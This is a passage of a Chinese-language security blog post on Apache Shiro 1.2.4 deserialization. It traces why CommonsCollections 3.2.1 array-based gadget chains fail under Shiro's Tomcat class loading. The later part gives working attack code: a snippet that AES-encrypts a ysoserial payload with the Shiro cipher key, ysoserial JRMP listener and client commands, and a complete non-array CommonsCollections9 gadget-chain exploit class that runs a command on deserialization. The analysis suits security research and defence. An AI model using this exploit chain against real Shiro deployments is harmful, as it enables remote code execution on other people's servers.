class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        <span class="keyword">byte</span>[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath(<span class="string">"&#123;ysoserailPoC.ser&#125;"</span>));</span><br><span class="line">        AesCipherService aes = <span class="keyword">new</span> AesCipherService();</span><br><span class="line">        <span class="keyword">byte</span>[] key = Base64.decode(CodecSupport.toBytes(<span class="string">"&#123;CipherKey&#125;"</span>));</span><br><span class="line"></span><br><span class="line">        ByteSource ciphertext = aes.encrypt(payloads, key);</span><br><span class="line">        System.out.printf(ciphertext.toString());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="CommonCollections版本为3-2-1下shiro反序列化问题的探究"><a href="#CommonCollections版本为3-2-1下shiro反序列化问题的探究" class="headerlink" title="CommonCollections版本为3.2.1下shiro反序列化问题的探究"></a>CommonCollections版本为3.2.1下shiro反序列化问题的探究</h3><h4 id="问题分析"><a href="#问题分析" class="headerlink" title="问题分析"></a>问题分析</h4><p>当cc版本为3.2.1的情况下，直接去打对应的cc5会出现如下报错</p>
<p><img src="https://s1.ax1x.com/2020/10/04/085G90.png" alt="085G90.png"></p>
<p>跟进下具体的readObject去看下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ClassResolvingObjectInputStream</span> <span class="keyword">extends</span> <span class="title">ObjectInputStream</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">ClassResolvingObjectInputStream</span><span class="params">(InputStream inputStream)</span> <span class="keyword">throws</span> IOException </span>&#123;</span><br><span class="line">        <span class="keyword">super</span>(inputStream);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> Class&lt;?&gt; resolveClass(ObjectStreamClass osc) <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> ClassUtils.forName(osc.getName());</span><br><span class="line">        &#125; <span class="keyword">catch</span> (UnknownClassException var3) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> ClassNotFoundException(<span class="string">"Unable to load ObjectStreamClass ["</span> + osc + <span class="string">"]: "</span>, var3);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到shiro这里是重写了ObjectInputStream类的resolveClass函数，原代码如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> Class&lt;?&gt; resolveClass(ObjectStreamClass desc)</span><br><span class="line">    <span class="keyword">throws</span> IOException, ClassNotFoundException</span><br><span class="line">&#123;</span><br><span class="line">    String name = desc.getName();</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> Class.forName(name, <span class="keyword">false</span>, latestUserDefinedLoader());</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException ex) &#123;</span><br><span class="line">        Class&lt;?&gt; cl = primClasses.get(name);</span><br><span class="line">        <span class="keyword">if</span> (cl != <span class="keyword">null</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> cl;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">throw</span> ex;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到这里是更换了类的查找方式，从Class.forName转为了ClassUtils.forName，跟进下ClassUtils.forName的内部实现</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Class <span class="title">forName</span><span class="params">(String fqcn)</span> <span class="keyword">throws</span> UnknownClassException </span>&#123;</span><br><span class="line">    Class clazz = THREAD_CL_ACCESSOR.loadClass(fqcn);</span><br><span class="line">    <span class="keyword">if</span> (clazz == <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (log.isTraceEnabled()) &#123;</span><br><span class="line">            log.trace(<span class="string">"Unable to load class named ["</span> + fqcn + <span class="string">"] from the thread context ClassLoader.  Trying the current ClassLoader..."</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        clazz = CLASS_CL_ACCESSOR.loadClass(fqcn);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (clazz == <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (log.isTraceEnabled()) &#123;</span><br><span class="line">            log.trace(<span class="string">"Unable to load class named ["</span> + fqcn + <span class="string">"] from the current ClassLoader.  "</span> + <span class="string">"Trying the system/application ClassLoader..."</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        clazz = SYSTEM_CL_ACCESSOR.loadClass(fqcn);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (clazz == <span class="keyword">null</span>) &#123;</span><br><span class="line">        String msg = <span class="string">"Unable to load class named ["</span> + fqcn + <span class="string">"] from the thread context, current, or "</span> + <span class="string">"system/application ClassLoaders.  All heuristics have been exhausted.  Class could not be found."</span>;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> UnknownClassException(msg);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> clazz;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到这里是用三种load的方式，分别是THREAD_CL_ACCESSOR，CLASS_CL_ACCESSOR，SYSTEM_CL_ACCESSOR</p>
<p>跟进THREAD_CL_ACCESSOR</p>
<p><a href="https://imgchr.com/i/087axx" target="_blank" rel="noopener"><img src="https://s1.ax1x.com/2020/10/04/087axx.png" alt="087axx.png"></a></p>
<p>而此时的ParallelWebappClassLoader已经是处于Tomcat上下文环境了，所以接下来的跟进要注意导入tomcat源码</p>
<p>接下来以三个类的加载过程来剖析下shiro的类加载机制</p>
<p>1.Java.lang.Exception</p>
<p>在ParallelWebappClassLoader的loadclass中，首先会检测loaded local class cache</p>
<p><img src="https://s1.ax1x.com/2020/10/04/08Ht0S.png" alt="08Ht0S.png"></p>
<p>跟下看下函数的具体实现</p>
<p><img src="https://s1.ax1x.com/2020/10/04/08zm01.png" alt="08zm01.png"></p>
<p>首先会通过binaryNameToPath函数将class名字转化为路径格式，然后在resourceEntries中进行查找已缓存类的path是否包含此path（不过看起来这些已缓存的path大多都是shiro的一些类</p>
<p>接着回到刚才的逻辑中</p>
<p><a href="https://imgchr.com/i/0GCFER" target="_blank" rel="noopener"><img src="https://s1.ax1x.com/2020/10/04/0GCFER.png" alt="0GCFER.png"></a></p>
<p>再次从loaded class cache中检索，具体代码实现如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">final</span> Class&lt;?&gt; findLoadedClass(String name) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!checkName(name))</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">    <span class="keyword">return</span> findLoadedClass0(name);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span> <span class="keyword">native</span> <span class="keyword">final</span> Class&lt;?&gt; findLoadedClass0(String name);</span><br></pre></td></tr></table></figure>

<p>这里的例子java.lang.Exception在这里即可被加载到</p>
<p>2.java.lang.runtime</p>
<p>此类在前两处缓存检索中无法找到，接着进入下面的逻辑</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0G3ViV.png" alt="0G3ViV.png"></p>
<p>首先依然是先转化出path,然后生成class loader，通过是否可以得到url来给tryLoadingFromJavaseLoader赋值</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (tryLoadingFromJavaseLoader) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        clazz = javaseLoader.loadClass(name);</span><br><span class="line">        <span class="keyword">if</span> (clazz != <span class="keyword">null</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (resolve)</span><br><span class="line">                resolveClass(clazz);</span><br><span class="line">            <span class="keyword">return</span> clazz;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException e) &#123;</span><br><span class="line">        <span class="comment">// Ignore</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>看下这个javaseLoader</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0GG5GV.png" alt="0GG5GV.png"></p>
<p>从上面的图片大概就可以知道这个loader是用来加载jdk里面的一些类的，最终通过findBootstrapClassOrNull函数找到对应的类并返回</p>
<p>3.[Ljava.lang.StackTraceElement</p>
<p>这种数组类也是很多人的疑问点，为什么这个数组类可以加载，而transformer的数组类就不可以加载，而网上的文章大多数也并不严谨，只是说cl.loadclass不能加载数组类型，而实际上连WebappClassLoaderBase.java这个文件都没有跟进，只是简单的复制粘贴过程，导致垃圾无意义的文章越来越多（大概用中文进行搜索很多都是这种无意义的文章）.</p>
<p>接下来就是看下为什么这个数组类可以被加载吧</p>
<p>同样的前两个缓存无法检索到，接着来到第三部分的加载</p>
<p><a href="https://imgchr.com/i/0GtA8P" target="_blank" rel="noopener"><img src="https://s1.ax1x.com/2020/10/04/0GtA8P.png" alt="0GtA8P.png"></a></p>
<p>可以看到数组类型的resourceName获取后的结果根本无法搜索到，导致getResource函数函数获取结果为空，无法进行findclass，所以导致此类无法在这里被加载</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0GU1XT.png" alt="0GU1XT.png"></p>
<p>接着向下跟进</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0GXBBq.png" alt="0GXBBq.png"></p>
<p>由于此类在tomcat环境上下文中存在，所以成功加载并返回</p>
<p>4.org.apache.commons.collections.functors.ConstantTransformer</p>
<p>直接跟进第四处加载部分（前面的三处加载无法找到此类）</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (log.isDebugEnabled())</span><br><span class="line">    log.debug(<span class="string">"  Searching local repositories"</span>);</span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    clazz = findClass(name);</span><br><span class="line">    <span class="keyword">if</span> (clazz != <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (log.isDebugEnabled())</span><br><span class="line">            log.debug(<span class="string">"  Loading class from local repository"</span>);</span><br><span class="line">        <span class="keyword">if</span> (resolve)</span><br><span class="line">            resolveClass(clazz);</span><br><span class="line">        <span class="keyword">return</span> clazz;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">catch</span> (ClassNotFoundException e) &#123;</span><br><span class="line">    <span class="comment">// Ignore</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟进findclass函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (log.isTraceEnabled())</span><br><span class="line">        log.trace(<span class="string">"      findClassInternal("</span> + name + <span class="string">")"</span>);</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> (securityManager != <span class="keyword">null</span>) &#123;</span><br><span class="line">            PrivilegedAction&lt;Class&lt;?&gt;&gt; dp =</span><br><span class="line">                <span class="keyword">new</span> PrivilegedFindClassByName(name);</span><br><span class="line">            clazz = AccessController.doPrivileged(dp);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            clazz = findClassInternal(name);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>跟进findClassInternal函数</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0GTLm8.png" alt="0GTLm8.png"></p>
<p>首先通过getContent函数来得到binaryContent,然后直接通过defineClass函数生成此类并返回</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0G7C60.png" alt="0G7C60.png"></p>
<p>那么接下来就是对[Lorg.apache.commons.collections.Transformer;为什么不能被加载原因的探讨了，主要还是在findclass中，同样还是进入findClassInternal函数</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0Gqq3j.png" alt="0Gqq3j.png"></p>
<p>由于对数组的处理bug问题，导致代码无法向下继续，接着进入如下代码逻辑</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0GLGrt.png" alt="0GLGrt.png"></p>
<p>由于loader为urlclassloader，所以也无法加载此类</p>
<p><img src="https://s1.ax1x.com/2020/10/04/0GOQoT.png" alt="0GOQoT.png"></p>
<p>可以看到这里的classpath加载的是tomcat的，不过如果在tomcat的lib下面加上一个commmoncollection的jar包，就可以load成功了。</p>
<h4 id="解决方案"><a href="#解决方案" class="headerlink" title="解决方案"></a>解决方案</h4><h5 id="JRMP-Bypass"><a href="#JRMP-Bypass" class="headerlink" title="JRMP Bypass"></a>JRMP Bypass</h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener <span class="number">8793</span> CommonsCollections5 <span class="string">'open /System/Applications/Calculator.app'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">java -jar ysoserial-master-SNAPSHOT.jar JRMPClient <span class="string">'0.0.0.0:8793'</span></span><br></pre></td></tr></table></figure>

<p>不过此方法会受到java版本的影响，在jdk8u45下成功，8u231下失败（这也是网上大多数文章根本没有提及的一点）</p>
<p>（请教了下LFY师傅，在高版本的jdk会有jep290的保护，导致jrmp失效，留个坑，之后来填）</p>
<p>随后我又试了8u191,8u112均可以成功</p>
<h5 id="通过非数组的构造链来RCE"><a href="#通过非数组的构造链来RCE" class="headerlink" title="通过非数组的构造链来RCE"></a>通过非数组的构造链来RCE</h5><p>在CommonCollections为4.0时，我们可以通过cc2来打通（也是因为2是通过TemplatesImpl.newTransformer来动态加载构造好的恶意类来rce的）</p>
<p>而在CommonCollections为3.2.1的时候，ysoserial的链都是通过ChainedTransformer的数组循环来rce的，但是这里的数组类在shiro中由于bug的问题无法加载成功，所以就需要一条非数组参与的链来实现。</p>
<p>这里参考下wh1t3p1g师傅的gadget构造思路</p>
<p><a href="https://www.anquanke.com/post/id/192619" target="_blank" rel="noopener">https://www.anquanke.com/post/id/192619</a></p>
<p>LazyMap#get</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">    <span class="function"><span class="keyword">public</span> Object <span class="title">get</span><span class="params">(Object key)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="keyword">super</span>.map.containsKey(key)) &#123;</span><br><span class="line">            Object value = <span class="keyword">this</span>.factory.transform(key);</span><br><span class="line">            <span class="keyword">super</span>.map.put(key, value);</span><br><span class="line">            <span class="keyword">return</span> value;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">super</span>.map.get(key);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里可以通过this.factory.transform和InvokerTransformer.transformer产生联动</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">#key-&gt;templates</span><br><span class="line"><span class="keyword">final</span> Object templates = Gadgets.createTemplatesImpl(<span class="string">"open /System/Applications/Calculator.app"</span>);</span><br><span class="line"></span><br><span class="line">#设置key</span><br><span class="line">TiedMapEntry entry = <span class="keyword">new</span> TiedMapEntry(lazyMap, templates);</span><br><span class="line"></span><br><span class="line"> Object value = <span class="keyword">this</span>.factory.transform(key);</span><br><span class="line"> </span><br><span class="line">#设置Method</span><br><span class="line"></span><br><span class="line"> Reflections.setFieldValue(transformer, <span class="string">"iMethodName"</span>, <span class="string">"newTransformer"</span>);</span><br><span class="line"> </span><br><span class="line">#Invoketransformer</span><br><span class="line">Class cls = input.getClass();</span><br><span class="line">Method method = cls.getMethod(<span class="keyword">this</span>.iMethodName, <span class="keyword">this</span>.iParamTypes);</span><br><span class="line"><span class="keyword">return</span> method.invoke(input, <span class="keyword">this</span>.iArgs);</span><br></pre></td></tr></table></figure>

<p>这里我是通过TiedMapEntry.toString()触发的getvalue而不是文章中hashcode触发的，所以前面配合一下BadAttributeValueExpException.readObject()就可以了，放下完整的exp</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> ysoserial.payloads;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.management.BadAttributeValueExpException;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Gadgets;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.keyvalue.TiedMapEntry;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.LazyMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.annotation.Authors;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.annotation.Dependencies;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.annotation.PayloadTest;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Gadgets;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.JavaVersion;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.PayloadRunner;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Reflections;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">	Gadget chain:</span></span><br><span class="line"><span class="comment">        ObjectInputStream.readObject()</span></span><br><span class="line"><span class="comment">            BadAttributeValueExpException.readObject()</span></span><br><span class="line"><span class="comment">                TiedMapEntry.toString()</span></span><br><span class="line"><span class="comment">                    LazyMap.get()</span></span><br><span class="line"><span class="comment">                        InvokerTransformer.transform()</span></span><br><span class="line"><span class="comment">                            templates(evil code)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">	Requires:</span></span><br><span class="line"><span class="comment">		commons-collections</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@SuppressWarnings</span>(&#123;<span class="string">"rawtypes"</span>, <span class="string">"unchecked"</span>&#125;)</span><br><span class="line"><span class="meta">@PayloadTest</span> ( precondition = <span class="string">"isApplicableJavaVersion"</span>)</span><br><span class="line"><span class="meta">@Dependencies</span>(&#123;<span class="string">"commons-collections:commons-collections:3.1"</span>&#125;)</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonsCollections9</span> <span class="keyword">extends</span> <span class="title">PayloadRunner</span> <span class="keyword">implements</span> <span class="title">ObjectPayload</span>&lt;<span class="title">BadAttributeValueExpException</span>&gt; </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> BadAttributeValueExpException <span class="title">getObject</span><span class="params">(<span class="keyword">final</span> String command)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">final</span> Object templates = Gadgets.createTemplatesImpl(<span class="string">"open /System/Applications/Calculator.app"</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">final</span> InvokerTransformer transformer =<span class="keyword">new</span> InvokerTransformer(<span class="string">"toString"</span>,<span class="keyword">new</span> Class[<span class="number">0</span>],<span class="keyword">new</span> Object[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">final</span> Map innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">final</span> Map lazyMap = LazyMap.decorate(innerMap, transformer);</span><br><span class="line"></span><br><span class="line">        TiedMapEntry entry = <span class="keyword">new</span> TiedMapEntry(lazyMap, templates);</span><br><span class="line"></span><br><span class="line">        BadAttributeValueExpException val = <span class="keyword">new</span> BadAttributeValueExpException(<span class="keyword">null</span>);</span><br><span class="line">        Field valfield = val.getClass().getDeclaredField(<span class="string">"val"</span>);</span><br><span class="line">        Reflections.setAccessible(valfield);</span><br><span class="line">        valfield.set(val, entry);</span><br><span class="line"></span><br><span class="line">        Reflections.setFieldValue(transformer, <span class="string">"iMethodName"</span>, <span class="string">"newTransformer"</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> val;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(<span class="keyword">final</span> String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        PayloadRunner.run(CommonsCollections9<span class="class">.<span class="keyword">class</span>, <span class="title">args</span>)</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">isApplicableJavaVersion</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> JavaVersion.isBadAttrValExcReadObj();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h5 id="新bypass手法的思考"><a href="#新bypass手法的思考" class="headerlink" title="新bypass手法的思考"></a>新bypass手法的思考</h5><p>在cl.loadclass中前两个loadclass会通过缓存来搜索类，如果我们可以通过某些操作把恶意class注入到缓存中，那么应该也能成为一种新的bypass手段（挖个坑</p>
<h3 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h3><p><a href="https://www.anquanke.com/post/id/192619" target="_blank" rel="noopener">https://www.anquanke.com/post/id/192619</a></p>
<p><a href="http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html" target="_blank" rel="noopener">http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html</a></p>
<p><a href="https://blog.zsxsoft.com/post/35" target="_blank" rel="noopener">https://blog.zsxsoft.com/post/35</a></p>
<p><a href="http://redteam.today/2019/09/20/shiro%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%A4%8D%E7%8E%B0/" target="_blank" rel="noopener">http://redteam.today/2019/09/20/shiro%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%A4%8D%E7%8E%B0/</a></p>

      
    </div>
    <footer class="article-footer">
      
        <a data-url="http://yoursite.com/2020/10/06/shiro-1-2-4%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8A%E6%89%A9%E5%B1%95%E6%80%9D%E8%80%83/" data-id="ckfxeh5eb0000dtre8irz34dg" class="article-share-link" data-share="baidu" data-title="shiro 1.2.4反序列化及扩展思考">Share</a>
      

      

      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/java/" rel="tag">java</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/shiro/" rel="tag">shiro</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2020/09/29/Fastjson%E5%88%86%E6%9E%90%E7%B3%BB%E5%88%97-%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%8F%8A%E6%80%BB%E7%BB%93/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Fastjson分析系列--历史漏洞分析及总结</div>
    </a>
  
</nav>

  
</article>

</section>
      
      <aside id="sidebar">
  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
